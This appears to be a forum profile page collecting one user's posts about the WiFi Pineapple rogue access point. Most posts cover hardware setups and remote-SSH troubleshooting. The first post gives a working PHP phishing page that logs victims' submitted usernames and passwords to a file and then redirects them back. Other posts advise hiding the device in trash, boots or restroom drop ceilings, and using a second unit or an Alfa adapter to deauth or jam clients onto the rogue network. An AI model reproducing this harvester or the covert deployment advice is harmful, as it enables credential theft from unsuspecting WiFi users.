Jump to content

Boba Fett

Active Members
  • Posts

    165
  • Joined

  • Last visited

Posts posted by Boba Fett

  1. <?php
    $ref = $_SERVER['HTTP_REFERER'];
    $today = date("F j, Y, g:i a");
    if (isset($_POST['name']) && !empty($_POST['name'])) {
            $nam = stripslashes($_POST['name']);
            $pas = stripslashes($_POST['pass']);
            $nam = htmlspecialchars($nam, ENT_QUOTES);
            $pas = htmlspecialchars($pas, ENT_QUOTES);
    
            $content = $today . "  --  " . $ref . "  --  " . $nam . "  --  " . $pas;
    
            $filed = @fopen("/pineapple/logs/phish.log", "a+");
            @fwrite($filed, "$content\n");
            @fclose($filed);
    }
    ?>
    
    <html><head>
    <script type="text/javascript">
    function goBack()
    {
    window.history.back()
    }
    </script>
    </head>
    <body onload="goBack()">
    </body></html>
    
    

    Here you go. Firmware 2.8.0

  2. Hi, for start this topic here is my first config:

    - Pineapple Mark4

    - 4GB HP Pendrive

    - D-Link USb Hub DUB-104 (100% Recommended. Small, 4 ports, No Energy Return)

    - Anker Astro3 Battery

    - Huawei 3G Modem

    - Hak5 Travel Bundle

    Pictures:

    img2013031700048.th.jpg

    img2013031700043.th.jpg

  3. Ok, I fixing the problem, but I have a issue.

    I program the pineapple to auto connect to 3g and keep alive the connection, and to auto connetc the ssh and keep alive the connection.

    Start the pineapple and all start, but when I tried to make the ssh connection get nothing. I have to connect to the pineapple via wifi, turn off the connection then on and doing this, all works fine. There is no a way to make this automatic?

    Maybe changin the cron job timing in the ssh keeping alive?

  4. I follow a Youtube Tutorial to configure my Pineapple to a remote ssh.

    All works fine, but when I reboot the pineapple to test the remote ssh with a 3G bundle, the pineapple doesnt make de ssh connection available.

    Now there is no way to make available the ssh connection.

    I got in the log this everytime:

    01:51:48 Pineapple user.err autossh[1921]: ssh exited prematurely with status 1; autossh exiting
    01:51:47 Pineapple user.info autossh[1921]: starting ssh (count 1)
    01:51:47 Pineapple user.info autossh[1921]: ssh child pid is 1922
    

    Any help?

  5. If you can get 2 pineapples that actually stay working you can build a very nice neinsager piggy-back,and use second pineapple as a foundation for launching deauth,and logging,leaving resources on pineapple 1 fairly low...

    I am BIG on enclosures right now:

    Trash can with false bottom.

    Power meters

    An old boot <~great for alleys and large city applications

    Books

    Other non-intrusive electronics - shell only

    I have lived in some very big cities, and I can tell ya that drug dealers in, like, Oakland, for example, keep stuff in old burgerking coffee cups or mcdonalds paper bags. They tell you what to grab from the gutter.

    NOONE picks up trash...

    ..so fairly safe.

    My favorite?

    Drop ceilings, drop ceilings, drop ceilings. Even secure buildings have restrooms, which almost always have a drop ceiling. My battery lasts 26 hrs plus...

    And how you give Internet to the pineapple? When you live it or you live it with usb hub? It will be interesting to see your config.

  6. I´m no to expert yet in this, but you can use the alpha to make a wiffijammer and force the connection to the pineapple wlan; you can use the alfa to connect the pineapple to internet too, etc...

    For better experience the best is use a usb hub, because for example you can do this:

    - Airport with wifi.

    - Pineapple connected to the airport wifi via alfa.

    - Pineapple making connections via wlan0

    - Modules on USB doing they job.

    Understand? My english is not so good.

  7. Save the following code as "logcleanup" and SCP it into /bin/ on the pineapple, that way you can run it straight from the SSH by executing 'logcleanup' in any directory you are, and you will be pleased to know, it should work from the WPS button.

    -Foxtrot

    Foxtrot, where I can find the script you mention?

  8. My gziped nedry rickroll. Drop it in the /usb/infusions/randomroll/randomroll/ folder and it will show up in the random roll infusion. I guess I should make an icon for it...

    Here's what's inside...

    ahahahh.mp3 index.html nedry.gif

    Ok, mi winrar doesnt extract it good, let me try with other app, thanks!!

×
×
  • Create New...